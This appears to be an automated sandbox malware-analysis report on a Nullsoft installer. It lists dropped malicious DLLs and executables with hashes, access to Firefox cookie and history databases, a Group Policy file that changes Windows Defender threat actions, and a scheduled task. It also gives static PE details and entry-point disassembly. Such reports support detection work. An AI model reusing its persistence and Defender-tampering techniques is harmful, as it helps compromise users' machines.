Preview:	L..................F.... ....Z.!....L......Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&...... M.....j......j.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.XYy....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......XWy..Local.<......DWSl.XYy....V.........................L.o.c.a.l.....N.1......Xqy..Temp..:......DWSl.Xqy....\.....................K.-.T.e.m.p.....T.1......Xiy..u2xs.2..>......Xhy.Xiy............................K.u.2.x.s...2.....V.2.0.%..X./ .run.exe.@......X./.Xky..............................r.u.n...e.x.e.......`...............-......._...........W.u......C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe......\.u.2.x.s...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......899552...........hT..CrF.f4... .^3.@.....,...W..hT..CrF.f4... .^3.@.....,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Reputation:	unknown
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Reputation:	unknown
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	5462
Entropy (8bit):	3.52113853369341
Encrypted:	false
SSDEEP:	96:W9H9h9j9n9a9K9o92939l9S9n9V9AyJ0LL0o0Gd01R0F0f0i0C0Z0w/:e
MD5:	4A22953F19005598A1AA2776DB15E522
SHA1:	648719AF40D07164FF31F18AB3F2A1DB3AD7CAC2
SHA-256:	404B90B03A9A6032BAB557D05A33D192B37050E5C048665F8831C7DDFBEE5748
SHA-512:	854C956E76F053B605C448005093C11BF4ADA372E18A957F7F837C10F30369D30F7F0D81C5D191F09C98286CAA1B299FAB0BEB6CB073580AA3FAEFF18EFE9629
Malicious:	false
Reputation:	unknown
Preview:	PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s...;.T.h.r.e.a.t.s._.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.2.5.4.5.1...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.5.6.5.9.6...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.4.2.8.7.2...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.T.h.r.e.a.t.s.\.T.h.r.e.a.t.I.d.D.e.f.a.u.l.t.A.c.t.i.o.n...;.2.1.4.7.7.4.9.3.7.3...;.....;.....;.6...].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.

C:\Windows\System32\GroupPolicy\gpt.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.9507895998010145
Encrypted:	false
SSDEEP:	6:1QnMzYHxbnPonn3dXsMzYHxbnn/JIAuNhUHdhJg+5Rnn3dzC:1QM0HxbnIV0Hxbn/JnumuuzC
MD5:	A62CE44A33F1C05FC2D340EA0CA118A4
SHA1:	1F03EB4716015528F3DE7F7674532C1345B2717D
SHA-256:	9F2CD4ACF23D565BC8498C989FCCCCF59FD207EF8925111DC63E78649735404A
SHA-512:	9D9A4DA2DF0550AFDB7B80BE22C6F4EF7DA5A52CC2BB4831B8FF6F30F0EE9EAC8960F61CDD7CFE0B1B6534A0F9E738F7EB8EA3839D2D92ABEB81660DE76E7732
Malicious:	true
Reputation:	unknown
Preview:	[General].gPCUserExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F73-3407-48AE-BA88-E8213C6761F1}].gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957E-509E-11D1-A7CC-0000F87571E3}{D02B1F72-3407-48AE-BA88-E8213C6761F1}].Version=100001.

C:\Windows\Tasks\biPxHmULFllsbMgnpt.job

Download File

Process:	C:\Windows\SysWOW64\schtasks.exe
File Type:	data
Category:	dropped
Size (bytes):	438
Entropy (8bit):	3.537752660449359
Encrypted:	false
SSDEEP:	6:X2DZXk/G5ZsUEZ+lX1Y2KoidyWRYr7t9ybBKb5ZsUEZ+lX1Y2Koid8lKqYEp5t/H:Xal4Q1bCsWG0pQ1bCul6XV2
MD5:	A8E116A894AFAB4D1F7BEA0170AD5A18
SHA1:	796AA9E3EF8B89729619B522D0057687B2D457AB
SHA-256:	455459153789393ADC1FB7825680858D3914E0F15FF5FCEE8C351B870B097BE4
SHA-512:	261DF04F6D399B3C68248264376BE15F0A9C1286A6EAAF93C7E5E5414E4F4E5B3864EE67142FD6972223A1D58C0A0E09C35419E5117B7DEF5536BE6BEEC44BDC
Malicious:	false
Reputation:	unknown
Preview:	.....4X^#8.O....s+..F.......<... .....s...............................;.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.z.S.5.A.7.9...t.m.p.\.I.n.s.t.a.l.l...e.x.e.....W.t. ./.g.C.s.d.i.d.C.e.B.m. .3.8.5.1.2.8. ./.S.../.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.z.S.5.A.7.9...t.m.p.....A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...............................................

C:\Windows\Temp\__PSScriptPolicyTest_dq1pym4i.djl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_pccgaugl.z4l.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6749184
Entropy (8bit):	7.789220407191343
Encrypted:	false
SSDEEP:	196608:FL4X13u2HKA5q6G/Ne+XaiFh6cCClKPjj79:FL/As6G0+TGbH
MD5:	90487EB500021DBCB9443A2CF972A204
SHA1:	62AE31665D462C8E5D6632F389B1E94AFB9BF00D
SHA-256:	4A86CA84B985A5228ECCD13F225BB403E9574E7F64B900A9ACC4D32BCB732FF2
SHA-512:	8CB3B1AE44246BEE8BF2B81220D7A5782C4E82B2B871A81BDC9EA170FBE477D7BE59C3543554F2CDEFDE7422BCC88B6624B966DFF1603C79D277329FB2074D17
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`d.T...T...T...YS..L...YS..%...YS..\|......E...T..........Y......U...RichT...........................PE..L....{.`......................_...................@..........................@g......5g...@.................................4.f......0g.......................g.......................................f.@.............f.4............................text...E........................... ..`.data....H_......(_.................@....idata........f.......f.............@..@.GIU..........f.......f.............@....reloc........g.......f.............@..B.rsrc........0g.......f.............@..@........................................................................................................................................................................................................................................................................................

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\bMpBlNc.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6749184
Entropy (8bit):	7.789220407191343
Encrypted:	false
SSDEEP:	196608:FL4X13u2HKA5q6G/Ne+XaiFh6cCClKPjj79:FL/As6G0+TGbH
MD5:	90487EB500021DBCB9443A2CF972A204
SHA1:	62AE31665D462C8E5D6632F389B1E94AFB9BF00D
SHA-256:	4A86CA84B985A5228ECCD13F225BB403E9574E7F64B900A9ACC4D32BCB732FF2
SHA-512:	8CB3B1AE44246BEE8BF2B81220D7A5782C4E82B2B871A81BDC9EA170FBE477D7BE59C3543554F2CDEFDE7422BCC88B6624B966DFF1603C79D277329FB2074D17
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`d.T...T...T...YS..L...YS..%...YS..\|......E...T..........Y......U...RichT...........................PE..L....{.`......................_...................@..........................@g......5g...@.................................4.f......0g.......................g.......................................f.@.............f.4............................text...E........................... ..`.data....H_......(_.................@....idata........f.......f.............@..@.GIU..........f.......f.............@....reloc........g.......f.............@..B.rsrc........0g.......f.............@..@........................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421446524477921
Encrypted:	false
SSDEEP:	6144:RSvfpi6ceLP/9skLmb0OTuWSPHaJG8nAgeMZMMhA2fX4WABlEnNu0uhiTw:ovloTuW+EZMM6DFyE03w
MD5:	268AFC8E7BB8EE7225EB3F5409AEAE5E
SHA1:	10804DBF05E5141AB068AB771AECC2A8F02081ED
SHA-256:	32DD1C02989F9C477988377D0C74EEAF0F42DAC81E9CA8DBAE024E8A7F02D018
SHA-512:	23FF8D7C0B58725314C52ECA53A3E2EF79A160AD441061801E43823BDCCBECE702689A3AD6D6E17851078305700C9150EE2B0845578AAAB436A687AEB62957C9
Malicious:	false
Reputation:	unknown
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmnNo................................................................................................................................................................................................................................................................................................................................................$.y0........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 203

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (808)
Category:	downloaded
Size (bytes):	813
Entropy (8bit):	5.172197053753884
Encrypted:	false
SSDEEP:	24:s/BwutcUIplGBHslgT9lCuABuoB7HHHHHHHYqmffffffo:OBDjIplGKlgZ01BuSEqmffffffo
MD5:	C669C91AA383E4934A310EAE4C07BB3B
SHA1:	521CB90DCD7648A6BF551FB2268FC67AF4DD79E7
SHA-256:	F0228DCFD8BAEEBE1863FF96807BBD06F93FBBFAAD8D5C1A6C7DF6B4138A89FA
SHA-512:	5B6814F4476B38F13BBE228A38E9BE48FE0015C90D939C2221B1E96D272EE53A3C67758601D68CB5ACD29A0ECFA3E2129A9EC5DD34B23E88BFB0DB70123D5186
Malicious:	false
Reputation:	unknown
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["chicago bears draft caleb williams","nyt connections hints april 26","apple iphone 16 pro max","starbucks drinks half off","chicago bears new stadium","flagship megatron auto converting robot","next gen fallout update","lufthansa 747 rough landing lax"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\gpupdate.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	129
Entropy (8bit):	4.366220328806915
Encrypted:	false
SSDEEP:	3:gBgvKCGPE3UkEmdOO2AGN8cwwHBkEmdOO2AGN8cwow:guSFMEkErONGN83YkErONGN837
MD5:	EF6D648C3DA0518B784D661B0C0B1D3D
SHA1:	C5C5F6E4AD6C3FD8BE4313E1A7C2AF2CAA3184AD
SHA-256:	18C16D43EB823C1BC78797991D6BA2898ACA8EB2DE5FD6946BE880F7C6FBBEF5
SHA-512:	E1E0443CA2E0BAFAC7CBBFD36D917D751AC6BE2F3F16D0B67B43EEBD47D6A7C36F12423AFA95B6BF56E5AAD155675C3307EFC6E94F0808EB72EF27B093EADD67
Malicious:	false
Reputation:	unknown
Preview:	Updating policy.........Computer Policy update has completed successfully....User Policy update has completed successfully.......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.874557127516294
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	50'907 bytes
MD5:	705685a8deace858e7fc849471c045f3
SHA1:	10132365b465a6f231c8e292f462c2d005b4f9b0
SHA256:	7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9
SHA512:	b9dd7d5ca384ff4ad053d5f01d721f1180b1028e40c96cd94e04f2b2965e2f4be6cf4d2595f67c3e62039320b517e32200ffec165a9c544344d666732a57c56d
SSDEEP:	1536:XferrLkSRoe8C4UZsys0Dh1duFpyFI+Plt:Xfi3k+oWDBDh1duFpXWlt
TLSH:	B133BF11E3A0C077D9F2037128363BA75FFA952616E45B0B43502F5D7CA3A82E91F7A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F97B05FFB1Ah
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F97B05FFAE8h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
